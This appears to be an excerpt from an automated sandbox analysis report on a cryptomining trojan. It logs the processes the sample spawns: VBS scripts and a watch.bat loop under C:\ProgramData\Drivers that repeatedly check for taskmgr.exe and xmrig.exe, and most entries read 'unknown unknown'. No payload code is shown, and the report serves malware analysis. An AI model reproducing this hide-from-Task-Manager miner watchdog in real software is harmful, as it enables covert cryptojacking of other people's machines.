Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
